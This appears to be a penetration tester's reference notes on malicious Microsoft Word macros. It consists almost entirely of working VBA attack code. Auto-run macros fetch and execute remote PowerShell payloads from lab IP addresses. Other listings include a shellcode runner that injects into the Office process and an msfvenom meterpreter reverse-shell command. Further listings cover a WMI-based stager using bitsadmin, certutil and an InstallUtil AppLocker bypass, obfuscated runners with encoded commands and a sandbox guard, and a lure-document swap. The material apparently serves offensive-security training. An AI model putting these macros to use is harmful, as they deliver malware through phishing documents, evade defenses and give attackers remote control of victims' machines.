MS Office
Thursday, June 18, 2020
12:02 PM
Backlink: reference-notes-readme
MS Word Macro Attack
VBA Direct Method
Macro Templates
Open Application
Sub MyMacro()
    ' Download-cradle stager: starts a hidden PowerShell that fetches run.ps1
    ' and pipes the text into Invoke-Expression.
    ' Shell() launches powershell.exe as a direct child of the Office process;
    ' the "Dechained from Word Process" listing further down avoids that
    ' parent/child link by creating the process through WMI instead.
    Dim cradle As String
    cradle = "powershell (New-Object System.Net.WebClient).DownloadString('http://192.168.49.246/run.ps1') | IEX"
    Call Shell(cradle, vbHide)
End Sub
Sub Document_Open()
    ' Document.Open event handler (only fires as an event when the code lives
    ' in ThisDocument). Hands off to MyMacro.
    Call MyMacro
End Sub
Sub AutoOpen()
    ' Legacy auto-macro; runs from any module when the document opens.
    ' If both this and Document_Open fire, MyMacro runs twice.
    Call MyMacro
End Sub
CreateNewThread
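' Win32 imports used by the CreateThread runner below. VBA7 syntax
' (PtrSafe / LongPtr) keeps the declarations valid in both 32- and 64-bit
' Office; pointer- and SIZE_T-sized parameters are declared LongPtr so they
' widen correctly on x64 instead of being truncated to 32-bit Long.
' VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
' RtlMoveMemory(dest, src, length): src is ByRef As Any so a plain VBA
' variable can be handed over and the API receives its address.
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As LongPtr) As LongPtr
' CreateThread(lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId)
' ThreadParameter is now ByVal: the original left it ByRef, so the API got a
' pointer to a temporary holding 0 rather than the value 0 itself (harmless
' for shellcode that ignores its argument, but not what the API expects).
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As LongPtr, ByVal StackSize As LongPtr, ByVal StartFunction As LongPtr, ByVal ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr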
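Function MyMacro()
    ' Self-injecting shellcode runner: copies the byte array into RWX memory
    ' inside the Office process and starts a thread on it.
    ' The bytes must be built for the same architecture as the hosting Office
    ' process (x86 shellcode in 32-bit Office, x64 in 64-bit Office); a
    ' mismatch crashes WINWORD.EXE rather than giving a shell.
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As LongPtr
    Dim size As Long

    ' Placeholder: paste the full byte array emitted by the payload generator.
    buf = Array(252, 232, ..., 213)

    ' UBound() is the last index, not the element count, so the original
    ' allocated one byte too few (masked only because VirtualAlloc rounds the
    ' request up to a whole page).
    size = UBound(buf) - LBound(buf) + 1

    ' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
    addr = VirtualAlloc(0, size, &H3000, &H40)
    If addr = 0 Then Exit Function   ' allocation failed; nothing to run

    ' Copy one byte at a time: RtlMoveMemory gets the address of the Long and
    ' a length of 1, so only its low-order byte (the value) is written.
    ' Offsetting by LBound keeps this correct under Option Base 1 as well.
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + (counter - LBound(buf)), data, 1)
    Next counter

    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function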
Sub Document_Open()
    ' Document.Open event handler (only fires as an event when the code lives
    ' in ThisDocument). Hands off to the shellcode runner.
    Call MyMacro
End Sub
Sub AutoOpen()
    ' Legacy auto-macro; runs from any module when the document opens.
    ' If both this and Document_Open fire, the shellcode is injected twice.
    Call MyMacro
End Sub
The CreateThread variant runs the shellcode inside the Office process itself, so the payload architecture must match the bitness of the installed Office: x86 shellcode for 32-bit Office (the common case these notes assume), or a `windows/x64/...` payload for 64-bit Office (`#If Win64` in VBA tells you which one you are in). Generate the shellcode in C# format (`-f csharp`) so the output can be pasted straight into the source of the encryption Helper binary.
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.49.250 lport=443 -f csharp
Copy/paste the entire output into the source code for Helper.
Save the document either in the legacy 97-2003 format, which keeps the default extension and still carries VBA (Word 97-2003 Document = .doc; Excel 97-2003 Workbook = .xls; etc.), or as a Macro-Enabled document (.docm/.xlsm, etc.). The plain .docx/.xlsx formats cannot store macros, so saving as one of those silently strips the payload.
Dechained from Word Process
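Sub MyMacro()
    ' Delete all comments before saving macro
    ' Stager: fetch the base64-encoded InstallUtil-bypass binary with
    ' bitsadmin, decode it with certutil, remove the encoded copy, then run the
    ' decoded assembly through installutil.exe /U (the InstallUtil AppLocker
    ' bypass described below this listing).
    ' logonScript.txt is the compiled exe from the InstallUtil bypass project.
    ' Process creation goes through WMI so the command is not a child of the
    ' Office process ("dechained").
    Dim dropDir As String
    Dim encPath As String
    Dim exePath As String
    Dim strArg As String

    ' The original hard-coded C:\users\ted\appdata; derive the directory from
    ' the current user's profile so the macro is not tied to one username.
    dropDir = Environ("USERPROFILE") & "\appdata"
    encPath = dropDir & "\logonScript"
    exePath = dropDir & "\logonScript.exe"

    ' Cleanup fix: the original deleted "enc.txt", a file this chain never
    ' creates; the encoded download (encPath) is what should be removed.
    strArg = "C:\Windows\System32\cmd.exe /C bitsadmin /Transfer myJob http://192.168.49.120/logonScript.txt " & encPath & _
             " && certutil -f -decode " & encPath & " " & exePath & _
             " && del " & encPath & _
             " && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U " & exePath

    GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid
End Sub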
Sub Document_Open()
    ' Document.Open event handler (only fires as an event when the code lives
    ' in ThisDocument). Hands off to the WMI stager.
    Call MyMacro
End Sub
Sub AutoOpen()
    ' Legacy auto-macro; runs from any module when the document opens.
    ' If both this and Document_Open fire, the stager runs twice.
    Call MyMacro
End Sub
The VBA above combines two techniques: the InstallUtil AppLocker bypass (installutil.exe /U executes the assembly's uninstaller, so the payload runs inside a Microsoft-signed .NET host instead of as a blocked .exe) and the "dechain" trick of creating the process through WMI's Win32_Process.Create, so the resulting process is a child of WmiPrvSE.exe rather than of the Office process.
Obfuscated VBA Runner
Use runner_doc-generate_payload.ps1 to produce the encoded payload string used in the code below. The GetObject/Get arguments are encoded the same way: each character is stored as a three-digit number (character code + 67) and recovered with Chr(n - 67), so this is a simple substitution encoding rather than encryption. The decoded strings are "winmgmts:" and "Win32_Process" — the same WMI Create call used in the other VBA macro examples — and the document-name check decodes to "runner.doc".
Function Pears(Beets)
    ' Decode one 3-digit chunk: the encoder stored (character code + 67),
    ' so subtracting 67 recovers the original character.
    Dim code As Long
    code = Beets - 67
    Pears = Chr(code)
End Function
Function Strawberries(Grapes)
    ' Return the leading 3-character chunk (one encoded character).
    Strawberries = Mid(Grapes, 1, 3)
End Function
Function Almonds(Jelly)
    ' Drop the leading 3-character chunk and return the remainder.
    ' (Right with a negative length raises "Invalid procedure call" for
    ' inputs shorter than 3 characters, as in the original.)
    Dim remaining As Long
    remaining = Len(Jelly) - 3
    Almonds = Right(Jelly, remaining)
End Function
Function Nuts(Milk)
    ' Decode a whole string of 3-digit chunks back to text, one character
    ' per chunk. Input length is assumed to be a multiple of 3; a short
    ' trailing chunk makes Pears() fail, exactly as in the original.
    Dim decoded As String
    Do
        decoded = decoded & Pears(Strawberries(Milk))
        Milk = Almonds(Milk)
    Loop While Len(Milk) > 0
    Nuts = decoded
End Function
Function MyMacro()
    ' Delete all comments before saving macro.
    ' Obfuscated WMI runner. The document-name check is a crude sandbox /
    ' rename guard: the encoded constant decodes to "runner.doc", so the
    ' macro silently does nothing when the file has been renamed or copied.
    ' The payload string decodes to a hidden PowerShell download cradle for
    ' http://192.168.49.205/run.txt; "winmgmts:" and "Win32_Process" are
    ' encoded the same way, so no WMI-related literal appears in clear.
    Dim encodedCmd As String
    Dim cmdLine As String
    Dim expectedName As String

    expectedName = Nuts("181184177177168181113167178166")
    If ActiveDocument.Name <> expectedName Then Exit Function

    encodedCmd = "179178186168181182171168175175099112168187168166099165188179164182182099112177178179099112186172177167178186182183188175168099171172167167168177099112166099172168187107107177168186112178165173168166183099182188182183168176113177168183113186168165166175172168177183108113167178186177175178164167182183181172177170107106171183183179125114114116124117113116121123113119124113117115120114181184177113183187183106108108"
    cmdLine = Nuts(encodedCmd)

    ' Win32_Process.Create: remaining arguments (current directory, startup
    ' info, process id) are left as undeclared Variants, i.e. Empty.
    GetObject(Nuts("186172177176170176183182125")).Get(Nuts("154172177118117162147181178166168182182")).Create cmdLine, startDir, startupInfo, procId
End Function
Sub Document_Open()
    ' Document.Open event handler (only fires as an event when the code lives
    ' in ThisDocument). Hands off to the obfuscated runner.
    Call MyMacro
End Sub
Sub AutoOpen()
    ' Legacy auto-macro; runs from any module when the document opens.
    ' If both this and Document_Open fire, the runner executes twice.
    Call MyMacro
End Sub
Renamed Obfuscated VBA Runner
Function argOne(argTwo)
    ' Decode one 3-digit chunk: the encoder stored (character code + 67).
    Dim code As Long
    code = argTwo - 67
    argOne = Chr(code)
End Function
Function argThree(argFour)
    ' Return the leading 3-character chunk (one encoded character).
    argThree = Mid(argFour, 1, 3)
End Function
Function argFive(argSix)
    ' Drop the leading 3-character chunk and return the remainder.
    ' (Inputs shorter than 3 characters raise "Invalid procedure call",
    ' as in the original.)
    Dim remaining As Long
    remaining = Len(argSix) - 3
    argFive = Right(argSix, remaining)
End Function
Function argSeven(argEight)
    ' Decode a whole string of 3-digit chunks back to text, one character
    ' per chunk. A trailing chunk shorter than 3 digits makes argOne() fail,
    ' exactly as in the original.
    Dim decoded As String
    Do
        decoded = decoded & argOne(argThree(argEight))
        argEight = argFive(argEight)
    Loop While Len(argEight) > 0
    argSeven = decoded
End Function
Function MyMacro()
    ' Delete all comments before saving macro.
    ' Same obfuscated WMI runner as the previous listing with the fruit names
    ' replaced by generic identifiers. The document-name constant decodes to
    ' "runner.doc"; when the file is renamed the macro exits without acting.
    ' The payload decodes to a hidden PowerShell download cradle for
    ' http://192.168.49.205/run.txt; "winmgmts:" / "Win32_Process" are
    ' encoded the same way.
    Dim encodedCmd As String
    Dim cmdLine As String
    Dim expectedName As String

    expectedName = argSeven("181184177177168181113167178166")
    If ActiveDocument.Name <> expectedName Then Exit Function

    encodedCmd = "179178186168181182171168175175099112168187168166099165188179164182182099112177178179099112186172177167178186182183188175168099171172167167168177099112166099172168187107107177168186112178165173168166183099182188182183168176113177168183113186168165166175172168177183108113167178186177175178164167182183181172177170107106171183183179125114114116124117113116121123113119124113117115120114181184177113183187183106108108"
    cmdLine = argSeven(encodedCmd)

    ' Win32_Process.Create; the trailing arguments are undeclared Variants
    ' (Empty) exactly as in the original.
    GetObject(argSeven("186172177176170176183182125")).Get(argSeven("154172177118117162147181178166168182182")).Create cmdLine, argTwelve, argThirteen, argFourteen
End Function
Sub Document_Open()
    ' Document.Open event handler (only fires as an event when the code lives
    ' in ThisDocument). Hands off to the renamed runner.
    Call MyMacro
End Sub
Sub AutoOpen()
    ' Legacy auto-macro; runs from any module when the document opens.
    ' If both this and Document_Open fire, the runner executes twice.
    Call MyMacro
End Sub
Substitute Page
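Sub MyMacro(Optional ByVal paraIndex As Long = 5)
    ' Document substitution: the real content is stored Base64-encoded (UTF-8)
    ' in paragraph paraIndex (5 by default) of the lure document. On open,
    ' decode it, wipe the lure text and insert the decoded text in its place.
    ' The paragraph index was hard-coded in the original; it is now an
    ' optional parameter so the existing no-argument callers keep working.
    Dim enc As String
    Dim clear As String

    ' Guard: a document with fewer paragraphs than expected would otherwise
    ' raise a runtime error on Paragraphs(paraIndex).
    If paraIndex < 1 Or paraIndex > ActiveDocument.Paragraphs.Count Then Exit Sub

    ' Read the paragraph text directly rather than selecting it first; the
    ' value (including the trailing paragraph mark) is the same as the
    ' original's Selection-based read.
    enc = ActiveDocument.Paragraphs(paraIndex).Range.Text
    clear = Base64Decode(enc, False)

    ' Replace the whole document body with the decoded text.
    ActiveDocument.Content.Delete
    ActiveDocument.Content.InsertAfter clear
End Sub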
' Base64-encodes sText.
' fAsUtf16LE selects the byte-level encoding applied before Base64:
'   True  -> UTF-16 LE (2-byte BOM skipped)
'   False -> UTF-8     (3-byte BOM skipped)
' The returned string therefore never carries a BOM.
Function Base64Encode(ByVal sText, ByVal fAsUtf16LE)
    Dim charset As String
    Dim bomLen As Long
    Dim node As Object

    If fAsUtf16LE Then
        charset = "utf-16le": bomLen = 2
    Else
        charset = "utf-8": bomLen = 3
    End If

    ' An MSXML element typed bin.base64 Base64-encodes whatever byte array is
    ' assigned to NodeTypedValue; the encoded form is read back as .Text.
    Set node = CreateObject("Msxml2.DOMDocument").CreateElement("aux")
    node.DataType = "bin.base64"
    node.NodeTypedValue = StrToBytes(sText, charset, bomLen)
    Base64Encode = node.Text
End Function
' Decodes a Base64 string back to text.
' fIsUtf16LE must match the encoding the original text was stored in:
'   True  -> UTF-16 LE
'   False -> UTF-8
Function Base64Decode(ByVal sBase64EncodedText, ByVal fIsUtf16LE)
    Dim charset As String
    Dim node As Object

    charset = IIf(fIsUtf16LE, "utf-16le", "utf-8")

    ' Assigning the Base64 text to a bin.base64-typed element exposes the
    ' decoded bytes through NodeTypedValue. NOTE(review): the substitution
    ' macro above feeds this a paragraph that still ends in Word's paragraph
    ' mark — it presumably relies on MSXML tolerating that trailing
    ' whitespace; verify if decoding ever fails.
    Set node = CreateObject("Msxml2.DOMDocument").CreateElement("aux")
    node.DataType = "bin.base64"
    node.Text = sBase64EncodedText
    Base64Decode = BytesToStr(node.NodeTypedValue, charset)
End Function
' Returns the byte array for sText in the given text encoding (for example
' "utf-8" or "utf-16le"). The first iBomByteCount bytes are skipped so the
' encoding's BOM is dropped; pass 0 to keep it.
Function StrToBytes(ByVal sText, ByVal sTextEncoding, ByVal iBomByteCount)
    Const adTypeBinary As Long = 1
    Const adTypeText As Long = 2
    Dim stm As Object

    Set stm = CreateObject("ADODB.Stream")

    ' Write the text through a stream opened in the requested charset...
    stm.Type = adTypeText
    stm.Charset = sTextEncoding
    stm.Open
    stm.WriteText sText

    ' ...then rewind, switch the same stream to binary and read the raw
    ' bytes starting just past the BOM.
    stm.Position = 0
    stm.Type = adTypeBinary
    stm.Position = iBomByteCount
    StrToBytes = stm.Read
    stm.Close
End Function
' Returns the string obtained by interpreting byteArray in the given text
' encoding (for example "utf-8" or "utf-16le").
Function BytesToStr(ByVal byteArray, ByVal sTextEncoding)
    Const adTypeBinary As Long = 1
    Const adTypeText As Long = 2
    Dim stm As Object

    ' Fast path: VBA strings are UTF-16 LE internally, so CStr() on the
    ' byte array yields the string directly.
    If LCase(sTextEncoding) = "utf-16le" Then
        BytesToStr = CStr(byteArray)
        Exit Function
    End If

    ' General path: push the bytes into a binary stream, then re-read the
    ' same stream as text in the requested charset.
    Set stm = CreateObject("ADODB.Stream")
    stm.Type = adTypeBinary
    stm.Open
    stm.Write byteArray
    stm.Position = 0
    stm.Type = adTypeText
    stm.Charset = sTextEncoding
    BytesToStr = stm.ReadText
    stm.Close
End Function
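Sub MyMacro2()
    ' Second stage: download a staged executable next to the document and
    ' launch it.
    ' Fixes vs. the original:
    '  * The download wrote to a relative 'msfstaged.exe' (PowerShell's
    '    working directory), while the launch used ActiveDocument.Path; both
    '    now use the same full path.
    '  * Wait(2) is not a built-in Word VBA routine (Application.Wait exists
    '    only in Excel) and a fixed delay races the download anyway; the
    '    download is now run synchronously via WScript.Shell.Run(..., True).
    '  * The exe is only launched if the download actually produced a file.
    Dim exePath As String
    Dim cradle As String
    Dim sh As Object

    exePath = ActiveDocument.Path & "\msfstaged.exe"
    cradle = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.110/msfstaged.exe', '" & exePath & "')"

    ' Window style 0 = hidden, bWaitOnReturn = True blocks until powershell
    ' exits. Like Shell(), this still spawns the child from the Office process.
    Set sh = CreateObject("WScript.Shell")
    sh.Run cradle, 0, True

    If Len(Dir(exePath)) = 0 Then Exit Sub   ' download failed; nothing to run
    ' Quote the path in case the document lives in a directory with spaces.
    Shell """" & exePath & """", vbHide
End Sub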
Sub Document_Open()
    ' Document.Open event handler (only fires as an event when the code lives
    ' in ThisDocument): swap in the decoded document, then fetch and run the
    ' staged executable.
    Call MyMacro
    Call MyMacro2
End Sub
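Sub AutoOpen()
    ' Legacy auto-macro; runs from any module when the document opens.
    ' Now mirrors Document_Open: the original only called MyMacro here, so if
    ' AutoOpen was the handler that fired (e.g. code pasted into a standard
    ' module) the second stage never ran.
    ' NOTE(review): if both AutoOpen and Document_Open fire on the same open,
    ' MyMacro runs twice and the second pass decodes the already-substituted
    ' paragraph 5 — confirm which handler is actually active for the target.
    Call MyMacro
    Call MyMacro2
End Sub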
The substitution macro above expects the lure document to carry the Base64-encoded replacement text (UTF-8 before encoding) in paragraph 5, the index hard-coded in MyMacro; with a different layout it raises a runtime error on Paragraphs(5) or decodes garbage, so build the .doc with the text in exactly that position.
InstallUtil CLM Bypass
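Sub MyMacro()
    ' Fetch the CLM-bypass assembly into C:\Windows\Tasks (commonly writable
    ' by standard users) and execute it via installutil.exe /U, which runs the
    ' assembly outside PowerShell's Constrained Language Mode.
    ' Fixes vs. the original:
    '  * "Framwork64" -> "Framework64" (the path did not exist).
    '  * Single backslashes: VBA string literals have no escape sequences, so
    '    "\\" was passed through as a literal double backslash.
    '  * The GetObject(...).Get(...).Create call had mangled parentheses and
    '    would not compile.
    ' Process creation goes through WMI so the child is not spawned by the
    ' Office process.
    Dim strArg As String
    Dim pid As Variant

    strArg = "powershell iwr -uri http://192.168.49.108/CLM_Bypass.exe -outfile C:\Windows\Tasks\CLM_Bypass.exe;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\CLM_Bypass.exe"
    GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid
End Sub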
Sub Document_Open()
    ' Document.Open event handler (only fires as an event when the code lives
    ' in ThisDocument). Hands off to the CLM-bypass stager.
    Call MyMacro
End Sub
Sub AutoOpen()
    ' Legacy auto-macro; runs from any module when the document opens.
    ' If both this and Document_Open fire, the stager runs twice.
    Call MyMacro
End Sub